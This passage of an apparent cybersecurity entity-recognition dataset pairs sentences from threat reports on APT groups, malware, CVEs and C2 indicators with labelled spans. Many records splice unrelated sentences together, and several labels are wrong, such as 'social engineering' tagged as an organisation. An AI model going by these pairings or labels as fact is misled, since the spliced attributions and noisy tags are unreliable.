Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n’t happening any time soon .", "spans": {"Malware: Royal": [[397, 402]], "Malware: BlackSuit": [[407, 416]]}, "info": {"id": "cyberner_stix_valid_000165", "source": "cyberner_stix_valid"}} {"text": "July 20 A new zero-day vulnerability ( CVE-2015-2426 ) was found in Windows , which Microsoft fixed in an out-of-band patch . CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date , and are analyzed in this report : TDTESS backdoor ; Vminst , a lateral movement tool ; NetSrv , a Cobalt Strike loader ; and ZPP , a files compression console program . Additionally , In early 2023 , KillMilk , the claimed founder of KillNet , attempted to ransom the purportedly stolen documents to NATO for 3 bitcoin , possibly in part to increase attention surrounding the activity .", "spans": {"Vulnerability: zero-day vulnerability": [[14, 36]], "Vulnerability: CVE-2015-2426": [[39, 52]], "System: Windows": [[68, 75]], "Organization: Microsoft": [[84, 93]]}, "info": {"id": "cyberner_stix_valid_000166", "source": "cyberner_stix_valid"}} {"text": "One common evasive mechanism used by the Spark backdoor is its ability to check for installed security products using WMI queries ( WQL ) .", "spans": {"Malware: Spark backdoor": [[41, 55]]}, "info": {"id": "cyberner_stix_valid_000167", "source": "cyberner_stix_valid"}} {"text": "The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions — often including military installations , intelligence agencies , and other government bodies . 
After that , the attacker is capable to control the compromised device .", "spans": {"Organization: specific individuals": [[247, 267]], "Organization: institutions": [[272, 284]], "Organization: military": [[303, 311]], "Organization: intelligence agencies": [[328, 349]], "Organization: government": [[362, 372]]}, "info": {"id": "cyberner_stix_valid_000168", "source": "cyberner_stix_valid"}} {"text": "\" ZjRTc1dTTU9nVW5FaXM3bGgvbU90MTlVMHFkb1c5SFFuRXhhSVR5YytIQkZremk3bk5wY21BUEZRYitJenA1cnlJY1lxREJJZ1RrL0N4UzZWcVVQM0pTUWFISlhKWG8wN1BxWE1hYThHSUdEVnBFakYrNlp1bXBvdUZMRFNYQVhxYk9tSElWYTFOTlpJK0hFVVBmTG9CQUV3VCtqQ2FCVUE1aHQ2SzllSHREMUpOdkdBUXZ3TWgyLzhtVHpha2I0TE81ZlpURTQyUmVjdFY1M0ZpemlRR1FLL1gzNE9mcU0zR0JqQ1ZnN1hCSmFGaC94RHBDMkNBRmZaSTVoVlhsaTBtQW5SR3N5QzVRY2lMNkpZVFJuRTQrUzBjdjU4SjY4ejRCL2FNbW9IakRheHdQd1RPUElkOHNDbDRVbmp2ZDM0ZVZlZTB1QVA0UHo0YllyVHRMZVRnPT0= \" .", "spans": {}, "info": {"id": "cyberner_stix_valid_000169", "source": "cyberner_stix_valid"}} {"text": "Back in 2011-2012 , the group used a relatively tiny implant ( known as “ Sofacy ” or SOURFACE ) as its first stage malware .", "spans": {"Malware: SOURFACE": [[86, 94]]}, "info": {"id": "cyberner_stix_valid_000170", "source": "cyberner_stix_valid"}} {"text": "The keywords are comprised of the names of individuals .", "spans": {}, "info": {"id": "cyberner_stix_valid_000171", "source": "cyberner_stix_valid"}} {"text": "MyReceiver and AlarmReceiver start the MainService whenever appropriate events occur . One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . BRONZE BUTLER : REDBALDKNIGHT , Tick .", "spans": {"Vulnerability: zero-day vulnerability": [[118, 140]], "Organization: Symantec": [[171, 179]]}, "info": {"id": "cyberner_stix_valid_000172", "source": "cyberner_stix_valid"}} {"text": "] com csip6 [ . APT41 has established and maintained strategic access to organizations in the healthcare , high-tech , and telecommunications sectors . 
POSHSPY is an excellent example of the skill and craftiness of APT29 .", "spans": {"Organization: healthcare": [[94, 104]], "Organization: high-tech": [[107, 116]], "Organization: telecommunications": [[123, 141]], "Organization: sectors": [[142, 149]], "Malware: POSHSPY": [[152, 159]]}, "info": {"id": "cyberner_stix_valid_000173", "source": "cyberner_stix_valid"}} {"text": "Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . Until late December 2015 , in nearly every Infy message documented since our tracking began in May 2013 , no attempt included strong tailoring of the approach , often not even including an email body , instead relying on cryptic filenames and email subjects to attract interest .", "spans": {"Organization: telecommunications": [[258, 276]], "Organization: shipping": [[279, 287]], "Organization: car manufacturers": [[290, 307]], "Organization: universities": [[310, 322]], "Organization: health care industries": [[327, 349]], "Malware: Infy message": [[410, 422]]}, "info": {"id": "cyberner_stix_valid_000174", "source": "cyberner_stix_valid"}} {"text": "Multiple Dipsind variants have been identified , all of which are believed to be used exclusively by PLATINUM . 
During Kaspersky Lab 's analysis of NetTraveler , the company 's experts identified six victims that had been infected by both NetTraveler and Red October , which was another cyberespionage operation analyzed by Kaspersky Lab in January 2013 .", "spans": {"Organization: Kaspersky Lab": [[119, 132], [324, 337]], "Malware: NetTraveler": [[148, 159]]}, "info": {"id": "cyberner_stix_valid_000175", "source": "cyberner_stix_valid"}} {"text": "Call Service Figure 5 : Code for the calls service As seen above , the calls service stores incoming call details in .mp3 format in the /sdcard/DCIM/.dat/ directory with file name appended with \" In_ '' for incoming calls and \" Out_ '' for outgoing calls . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . It is sometimes referred to as FIN7 , but these appear to be two groups using the same Carbanak malware and are therefore tracked separately .", "spans": {"Vulnerability: CVE-2010-3962": [[271, 284]], "Vulnerability: CVE-2014-1776": [[327, 340]], "Malware: Carbanak": [[438, 446]]}, "info": {"id": "cyberner_stix_valid_000176", "source": "cyberner_stix_valid"}} {"text": "If one of the applications is deleted , the second application downloads and re-installs the removed one . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . 
FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors .", "spans": {"Organization: FireEye iSIGHT Intelligence": [[107, 134]], "Vulnerability: zero-day Adobe Flash vulnerability": [[199, 233]], "Vulnerability: CVE-2018-4878": [[236, 249]], "Organization: restaurant": [[387, 397]], "Organization: services": [[400, 408]], "Organization: financial sectors": [[413, 430]]}, "info": {"id": "cyberner_stix_valid_000177", "source": "cyberner_stix_valid"}} {"text": "As described in earlier analyses , Downeks ’ main purpose is as a downloader .", "spans": {"Malware: Downeks": [[35, 42]]}, "info": {"id": "cyberner_stix_valid_000178", "source": "cyberner_stix_valid"}} {"text": "From the samples we collected , we can conclude that the same threat actor produced many individual malware modules during the last ten years . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"Malware: Carbanak": [[144, 152]], "Organization: consumer": [[220, 228]], "Malware: Carberp": [[320, 327]]}, "info": {"id": "cyberner_stix_valid_000179", "source": "cyberner_stix_valid"}} {"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . 
As we wrote then , compared to Kingphish , Bahamut operates as though it were a generation ahead in terms of professionalism and ambition .", "spans": {"Malware: sample": [[146, 152]], "Vulnerability: CVE-2017-11882": [[172, 186]], "Vulnerability: CVE-2018-0802": [[190, 203]]}, "info": {"id": "cyberner_stix_valid_000180", "source": "cyberner_stix_valid"}} {"text": "The code supports two different installation methods : setup in a UAC-enforced environment ( with limited privileges ) , or an installation with full-administrative privileges enabled ( in cases where the malware gains the ability to run with elevated permissions ) . APT35 , also known as the Newscaster Team , is a threat group sponsored by the Iranian government that conducts long term , resource-intensive operations to collect strategic intelligence . To aid in the recovery of encrypted payloads , the following Python script can be used to decode pixel colors from a .png image . If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload • None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": {"System: UAC-enforced environment": [[66, 90]]}, "info": {"id": "cyberner_stix_valid_000181", "source": "cyberner_stix_valid"}} {"text": "We also observed automatically generated files on the C2 , indicating the actor behind this campaign also issues commands to search for and exfiltrate PDF and Office documents . This is also a full-featured backdoor controlled by email , and which can work independently of any other Turla component . The ShellMain function is a stub that relocates the DLL to another buffer and spawns a thread that starts from ShellMainThreadInt at offset +0xC0CD . 
Through this entry , in which we take a closer look at an individual who we believe might be connected to the Winnti group , we hope to give both ordinary users and organizations better insights into some of the tools – notably the server infrastructures- these kinds of threat actors use , as well as the scale in which they operate .", "spans": {"Organization: ordinary users": [[598, 612]], "Organization: organizations": [[617, 630]], "System: server infrastructures-": [[684, 707]]}, "info": {"id": "cyberner_stix_valid_000182", "source": "cyberner_stix_valid"}} {"text": "This is done by opening the Google account creation process and parsing the current view . Attackers then moved on to the motor industry in late May . TechNet ’s security was in no way compromised by this tactic , which is likely possible on other message boards and forums . As a consequence , four trams were derailed and twelve people injured due to resulting emergency stops .", "spans": {"Organization: Google": [[28, 34]], "Organization: motor industry": [[122, 136]]}, "info": {"id": "cyberner_stix_valid_000183", "source": "cyberner_stix_valid"}} {"text": "Later campaigns saw new attachment types , even as Dridex and Locky payloads remained largely unchanged .", "spans": {"Malware: Dridex": [[51, 57]], "Malware: Locky": [[62, 67]]}, "info": {"id": "cyberner_stix_valid_000184", "source": "cyberner_stix_valid"}} {"text": "APT28 has continued to develop its tools over the past two years .", "spans": {}, "info": {"id": "cyberner_stix_valid_000185", "source": "cyberner_stix_valid"}} {"text": "They move laterally and escalate system privileges to extract sensitive information — whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult . 
Sometimes , however , certain samples made use of domain names for HTTP communication .", "spans": {}, "info": {"id": "cyberner_stix_valid_000186", "source": "cyberner_stix_valid"}} {"text": "This is only a small picture of the threat actor 's operations . Seeking to tease out any possible links between Operation Aurora , VOHO , Operation DeputyDog , and Ephemeral Hydra , we began with Symantec 's Hidden Lynx report as our foundation . We have evidence suggesting that APT1 manually controls thousands of systems in support of their attacks , and have directly observed their control over hundreds of these systems . It can range from asking “ customers ” to pay a monthly fee for access to this set of tools to use in cyber attacks , or users can even pay the original creators to distribute the malware on their behalf and manage the infection .", "spans": {"Organization: Symantec": [[197, 205]]}, "info": {"id": "cyberner_stix_valid_000187", "source": "cyberner_stix_valid"}} {"text": "Educate users about the risks of spearphishing emails .", "spans": {}, "info": {"id": "cyberner_stix_valid_000188", "source": "cyberner_stix_valid"}} {"text": "] site/gate_cb8a5aea1ab302f0_c online 208.91.197 [ . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . It was a decoy to make visitor download a \" Flash Player \" , which was in fact DownPaper malware , analyzed later in this report .", "spans": {"Malware: .NET module": [[69, 80]], "Malware: KopiLuwak JavaScript": [[105, 125]], "Malware: DownPaper": [[214, 223]], "Malware: malware": [[224, 231]]}, "info": {"id": "cyberner_stix_valid_000189", "source": "cyberner_stix_valid"}} {"text": "On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . 
In early 2016 , the Callisto Group was observed sending targeted spear phishing emails .", "spans": {"Organization: financial": [[133, 142]], "Organization: high-tech companies": [[147, 166]]}, "info": {"id": "cyberner_stix_valid_000190", "source": "cyberner_stix_valid"}} {"text": "The main infection vector is a phishing attack using SMS/MMS . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . Since this malware dates back to around 2004 , there are many samples containing CNC URLs from the 3322.org page . The HyperText Transfer Protocol ( HTTP ) redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the header .", "spans": {"Vulnerability: CVE-2017-7269": [[79, 92]], "Indicator: 3322.org": [[315, 323]], "System: The HyperText Transfer Protocol ( HTTP )": [[331, 371]]}, "info": {"id": "cyberner_stix_valid_000191", "source": "cyberner_stix_valid"}} {"text": "Report_URL : https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", "spans": {}, "info": {"id": "cyberner_stix_valid_000192", "source": "cyberner_stix_valid"}} {"text": "Missing permissions The lack of the READ_FRAME_BUFFER permission can be justified by the removal of the screen record feature . executable compilation times suggest early 2012 . RIPTIDE ’s first communication with its C2 server fetches an encryption key , and the RC4 encryption key is used to encrypt all further communication . 
Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.[22][23 ]", "spans": {"Malware: RIPTIDE": [[178, 185]], "Malware: Magic Hound malware": [[330, 349]]}, "info": {"id": "cyberner_stix_valid_000193", "source": "cyberner_stix_valid"}} {"text": "The initial attack vector leveraged a phishing email , using the subject line of Upcoming Defense events February 2018 and a sender address claiming to be from Jane ’s 360 defense events events@ihsmarkit.com .", "spans": {"Organization: Upcoming Defense": [[81, 97]], "Organization: 360": [[168, 171]], "Indicator: events@ihsmarkit.com": [[187, 207]]}, "info": {"id": "cyberner_stix_valid_000194", "source": "cyberner_stix_valid"}} {"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() . Ordnance will be able to immediately generate shellcode after users provide the IP and PROT that the shellcode should connect to or listen on .", "spans": {"Vulnerability: CVE-2017-10271": [[110, 124]], "Indicator: Ordnance": [[258, 266]], "Indicator: shellcode": [[359, 368]]}, "info": {"id": "cyberner_stix_valid_000195", "source": "cyberner_stix_valid"}} {"text": "On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . 
In the known spear phishing attacks by the Callisto Group , they employed the \" Scout \" malware tool from the RCS Galileo platform .", "spans": {"Organization: media": [[47, 52]], "Organization: government agency": [[110, 127]], "Malware: Scout": [[350, 355]]}, "info": {"id": "cyberner_stix_valid_000196", "source": "cyberner_stix_valid"}} {"text": "Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": {"Organization: government": [[109, 119]], "Organization: financial": [[122, 131]], "Organization: automotive": [[134, 144]], "Organization: media industries": [[151, 167]], "Malware: Infy": [[174, 178]], "Malware: malware": [[179, 186]], "Organization: Iranians": [[206, 214]], "Organization: broadcast journalist": [[294, 314]], "Organization: BBC Persian": [[318, 329]]}, "info": {"id": "cyberner_stix_valid_000197", "source": "cyberner_stix_valid"}} {"text": "Hashes of samples Type Package name SHA256 digest Custom ads com.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928 Click fraud com.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04 BBSRAT is typically packaged within a portable executable file , although in a few of the observed instances , a raw DLL was discovered to contain BBSRAT . Two files are created for the task at approximately the same time : C:\\Windows\\System32\\Tasks\\At1 and C:\\Windows\\Tasks\\At1.job . 
The PE file also appeared to be a modification of the Miniduke 's main backdoor module that uses the same Twitter URL as the Java payload .", "spans": {"Indicator: C:\\Windows\\Tasks\\At1.job": [[570, 594]], "Malware: Miniduke 's main backdoor module": [[651, 683]], "Malware: Java payload": [[722, 734]]}, "info": {"id": "cyberner_stix_valid_000198", "source": "cyberner_stix_valid"}} {"text": "Report_URL : https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/", "spans": {}, "info": {"id": "cyberner_stix_valid_000199", "source": "cyberner_stix_valid"}} {"text": "FakeSpy masquerades as legitimate postal service apps and transportation services in order to gain the users ' trust . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . Its activity subsequently increased in the second quarter of 2018 , with a particular spike in April 2018 .", "spans": {"Malware: FakeSpy": [[0, 7]], "Organization: Rapid7": [[119, 125]], "Malware: ccSEUPDT.exe": [[171, 183]]}, "info": {"id": "cyberner_stix_valid_000200", "source": "cyberner_stix_valid"}} {"text": "Eleven of the links were clicked once , four were clicked twice , two were clicked three times , and two were clicked four times .", "spans": {}, "info": {"id": "cyberner_stix_valid_000201", "source": "cyberner_stix_valid"}} {"text": "Malware Testing Environment Tied to TEMP.Veles .", "spans": {}, "info": {"id": "cyberner_stix_valid_000202", "source": "cyberner_stix_valid"}} {"text": "In the lab , we changed our Quasar RAT source code to use the known encryption key , and to send fake victim IP address , City , Country code , Flag , and Username .", "spans": {"Malware: Quasar RAT": [[28, 38]]}, "info": {"id": "cyberner_stix_valid_000203", "source": "cyberner_stix_valid"}} {"text": "Patch applications and operating systems .", "spans": {}, "info": {"id": "cyberner_stix_valid_000204", "source": "cyberner_stix_valid"}} {"text": "First , an activity named MainActivity fires up , taking care of hiding the 
icon and showing the fake notification . During our 2018 monitoring of this group , we were able to identify different techniques utilized by very similar attackers in the MENA region , sometimes on the same target . Winnti malware handles outbound communications using multiple protocols including : ICMP , HTTP , as well as custom TCP and UDP protocols .", "spans": {"Malware: Winnti": [[293, 299]]}, "info": {"id": "cyberner_stix_valid_000205", "source": "cyberner_stix_valid"}} {"text": "Beaconing information The ID is generated for each installation of the malware , while the token remains unique . It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering . January 2019 sent via 149.28.156.61 to deliver either Derusbi or KHRat samples with either cswksfwq.kfesv.xyz or connect.bafunpda.xyz as C2 . LIGHTWORK utilizes positional command line arguments for target device , port , and IEC-104 command .", "spans": {"Organization: politically": [[170, 181]], "Indicator: 149.28.156.61": [[284, 297]], "Malware: Derusbi": [[316, 323]], "Malware: KHRat": [[327, 332]], "Indicator: cswksfwq.kfesv.xyz": [[353, 371]], "Indicator: connect.bafunpda.xyz": [[375, 395]]}, "info": {"id": "cyberner_stix_valid_000206", "source": "cyberner_stix_valid"}} {"text": "Worryingly , some of the modifications enforced by the spyware might expose the infected devices to further compromise or data tampering . On August 23 , 2017 , we observed OilRig targeting an organization within the United Arab Emirates government . The Exfiltration , however , is done via other cloud providers . 
However , the problem in general with labeling every ransomware attack as sophisticated is that it excuses the organization that has nt followed the basic preventative best practices .", "spans": {"Organization: government": [[238, 248]]}, "info": {"id": "cyberner_stix_valid_000207", "source": "cyberner_stix_valid"}} {"text": "A particularly interesting aspect of one of the two documents we analyzed was the filename used , crash list ( Lion Air Boeing 737 ).docx .", "spans": {"Indicator: crash list ( Lion Air Boeing 737 ).docx": [[98, 137]]}, "info": {"id": "cyberner_stix_valid_000208", "source": "cyberner_stix_valid"}} {"text": "The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering . Unit 42 enumerated the threat infrastructure related to Bookworm and created a chart to visualize connected entities to its current attack campaign .", "spans": {"Organization: social engineering": [[181, 199]], "Organization: Unit 42": [[202, 209]], "Malware: Bookworm": [[258, 266]]}, "info": {"id": "cyberner_stix_valid_000209", "source": "cyberner_stix_valid"}} {"text": "Specifically , the threat group used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": {"Organization: Microsoft": [[96, 105], [209, 218]], "System: Windows": [[106, 113], [219, 226]], "Vulnerability: CVE-2014-6332": [[156, 169]]}, "info": {"id": "cyberner_stix_valid_000210", "source": "cyberner_stix_valid"}} {"text": "TG-3390 is known for compromising organizations via SWCs and moving quickly to install backdoors on Exchange servers .", "spans": {}, "info": {"id": "cyberner_stix_valid_000211", "source": "cyberner_stix_valid"}} {"text": "Although there was no evidence of the group using the malware , the threat actors may 
have leveraged its access or capabilities during earlier phases of the intrusions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000212", "source": "cyberner_stix_valid"}} {"text": "Cannon email Accounts :", "spans": {"Malware: Cannon": [[0, 6]]}, "info": {"id": "cyberner_stix_valid_000213", "source": "cyberner_stix_valid"}} {"text": "Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": {"Vulnerability: vulnerabilities": [[30, 45]], "Organization: Middle Eastern human rights activist": [[164, 200]]}, "info": {"id": "cyberner_stix_valid_000214", "source": "cyberner_stix_valid"}} {"text": "The data is first encrypted and then encoded with Base64 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000215", "source": "cyberner_stix_valid"}} {"text": "How does the malware work without code for these key components ? At least one of the attacks in this campaign leveraged a European security and defense-themed lure , which aligns with the targeting preferences for this group . Aside from this, there were several other suspicious items we noted: Headers mismatched: The Reply-To and From email address were . 
But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": {"Vulnerability: CVE-2023 - 34362": [[434, 450]]}, "info": {"id": "cyberner_stix_valid_000216", "source": "cyberner_stix_valid"}} {"text": "Sofacy ’s reported presence in the DNC network alongside APT29 brought possibly the highest level of public attention to the group ’s activities in 2016 , especially when data from the compromise was leaked and “ weaponized ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000217", "source": "cyberner_stix_valid"}} {"text": "The function main uses a DES encryption algorithm to encode these addresses . To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . During our brief window of visibility into one of the known 22 CnC nodes , FireEye observed the Ke3chang conducting reconnaissance and moving laterally throughout the compromised networks .", "spans": {"Vulnerability: CVE-2017-11882": [[267, 281]], "Organization: FireEye": [[396, 403]]}, "info": {"id": "cyberner_stix_valid_000218", "source": "cyberner_stix_valid"}} {"text": "Having analyzed a few variants of the malware , we noticed that the private key was exposed in the code and did not change . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . 
Symantec detects this threat as Backdoor.Nidiran .", "spans": {"Organization: Symantec": [[403, 411]], "Indicator: Backdoor.Nidiran": [[435, 451]]}, "info": {"id": "cyberner_stix_valid_000219", "source": "cyberner_stix_valid"}} {"text": "The investigation uncovered that an actor had used these devices to gain initial access to corporate networks .", "spans": {}, "info": {"id": "cyberner_stix_valid_000220", "source": "cyberner_stix_valid"}} {"text": "A third , similar , CosmicDuke campaign was observed presumably targeting Georgian entities since it used an attachment with a Georgian-language name that translates to “ NATO consolidates control of the Black Sea.docx ” .", "spans": {"Malware: CosmicDuke": [[20, 30]], "Indicator: NATO consolidates control of the Black Sea.docx": [[171, 218]]}, "info": {"id": "cyberner_stix_valid_000221", "source": "cyberner_stix_valid"}} {"text": "To surface its ransom note , it uses a series of techniques that take advantage of the following components on Android : The “ call ” notification , among several categories of notifications that Android supports , which requires immediate user attention . All contain the same Visual Basic macro code and author name as Honeybee . After the check , Pikabot is a new malware first seen in early 2023 .", "spans": {"System: Android": [[111, 118], [196, 203]], "Malware: Pikabot": [[350, 357]]}, "info": {"id": "cyberner_stix_valid_000222", "source": "cyberner_stix_valid"}} {"text": "But there 's little stopping it from doing much worse . CTU researchers assess this as the continuation of activity first observed in 2016 , and it is likely that the campaign is ongoing . APT33 : 8.26.21.220 [REDACTED].ddns.net . 
One possibility is that such claims were made disingenuously as an attempt to establish KillNet 's credibility and/or as a means to distance the group from the Russian government .", "spans": {"Organization: CTU": [[56, 59]], "Indicator: 8.26.21.220": [[197, 208]], "Indicator: [REDACTED].ddns.net": [[209, 228]], "Organization: the Russian government .": [[387, 411]]}, "info": {"id": "cyberner_stix_valid_000223", "source": "cyberner_stix_valid"}} {"text": "BOSS SPIDER used both enterprise and per-host pricing during their campaigns . In many attacks , the group has succeeded in compromising Microsoft Exchange or Lotus Domino email servers in order to intercept company emails and possibly use them to send counterfeit emails .", "spans": {"Malware: Microsoft Exchange": [[137, 155]], "Malware: Lotus Domino email servers": [[159, 185]]}, "info": {"id": "cyberner_stix_valid_000224", "source": "cyberner_stix_valid"}} {"text": "The fact that the overlay screens are almost identical to the legitimate banking apps suggests that the actors might be very familiar with the Spanish banking applications and might even be accustomed to the language . In one of the attacks , Rapid7 identified the attackers escaping a Citrix application in order to run the payload script on the victim desktop . The Gh0st downloaders employ simple substitution ciphers for hiding strings .", "spans": {"Organization: Rapid7": [[243, 249]], "Malware: Gh0st": [[368, 373]]}, "info": {"id": "cyberner_stix_valid_000225", "source": "cyberner_stix_valid"}} {"text": "The attacks use Domain Name System ( DNS ) cache poisoning/DNS spoofing , possibly through infringement techniques such as brute-force or dictionary attacks , to distribute and install malicious Android apps . The actors behind LUCKY ELEPHANT recognize the effectiveness and use doppelganger webpages nearly identical to legitimate sites , enticing users to input their credentials . 
Only a small portion of this code is actually used to start the infection , the rest is just junk code .", "spans": {"System: Android": [[195, 202]]}, "info": {"id": "cyberner_stix_valid_000226", "source": "cyberner_stix_valid"}} {"text": "Although early versions had some basic code and string obfuscation , protection of the third version of the malware was enhanced with the use of payload obfuscation . The attackers then enumerated access and conducted privilege escalation on the victim networks , utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware . The \" Tick \" group has conducted cyber espionage attacks against organizations in the Republic of Korea and Japan for several years .", "spans": {}, "info": {"id": "cyberner_stix_valid_000227", "source": "cyberner_stix_valid"}} {"text": "however , overall there is wide geographical spread of infections .", "spans": {}, "info": {"id": "cyberner_stix_valid_000228", "source": "cyberner_stix_valid"}} {"text": "This evidence indicates that the certificate ’s rightful owner either misused it or it had been stolen from them .", "spans": {}, "info": {"id": "cyberner_stix_valid_000229", "source": "cyberner_stix_valid"}} {"text": "Back in October 2016 , Unit 42 published an initial analysis on a Flash exploitation framework used by the Sofacy threat group called DealersChoice .", "spans": {}, "info": {"id": "cyberner_stix_valid_000230", "source": "cyberner_stix_valid"}} {"text": "] infokalisi [ . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) . The supplied registration information , which is still visible in public “ whois ” data as of February 3, 2013 . 
If scripts are not commonly used on a system , but enabled , scripts running out of cycle from patching or other administrator functions are suspicious .", "spans": {"Organization: Iranians": [[53, 61]], "Organization: broadcast journalist": [[141, 161]]}, "info": {"id": "cyberner_stix_valid_000231", "source": "cyberner_stix_valid"}} {"text": "Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool .", "spans": {"Organization: Symantec": [[92, 100]], "Organization: CTU": [[231, 234]], "Indicator: s.txt": [[271, 276]]}, "info": {"id": "cyberner_stix_valid_000232", "source": "cyberner_stix_valid"}} {"text": "We 've seen that this has been the case for many years with spear-phishing campaigns on desktop and mobile platforms , so , unfortunately , it does n't seem that this will change any time soon . Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . We do not have evidence that the earliest targeted financial institutions were victimized by fraudulent transactions before APT38 left the compromised environments , possibly indicating that APT38 was conducting reconnaissance-only activity at that time .", "spans": {"Organization: financial institutions": [[395, 417]]}, "info": {"id": "cyberner_stix_valid_000233", "source": "cyberner_stix_valid"}} {"text": "The Apple Developer Enterprise program is intended to allow organizations to distribute proprietary , in-house apps to their employees without needing to use the iOS App Store . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 . 
As MuddyWater has consistently been using POWERSTATS as its main tool , they are relatively easy to distinguish from other actors .", "spans": {"Organization: Apple Developer Enterprise": [[4, 30]], "System: iOS": [[162, 165]], "System: App Store": [[166, 175]], "Organization: Microsoft": [[178, 187]], "Vulnerability: SMBv1 vulnerabilities": [[202, 223]], "Malware: POWERSTATS": [[314, 324]]}, "info": {"id": "cyberner_stix_valid_000234", "source": "cyberner_stix_valid"}}
{"text": "However , the persistent presence of Italian language both on the Google Play Store pages as well as inside the spyware code was a clear sign that an Italian actor was behind the creation of this platform . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . When the victims open the document , they are encouraged to click on Enable Content , which causes the embedded malicious macro E-TOOL code to run . It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": {"System: Google Play": [[66, 77]], "Malware: Microsoft Word attachment": [[287, 312]], "Vulnerability: CVE-2017-0199": [[345, 358]]}, "info": {"id": "cyberner_stix_valid_000235", "source": "cyberner_stix_valid"}}
{"text": "Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . To our knowledge , Turla is the only espionage group that currently uses a backdoor entirely controlled by emails , and more specifically via PDF attachments .", "spans": {"Vulnerability: CVE-2014-6332": [[40, 53]], "Malware: PDF attachments": [[273, 288]]}, "info": {"id": "cyberner_stix_valid_000236", "source": "cyberner_stix_valid"}}
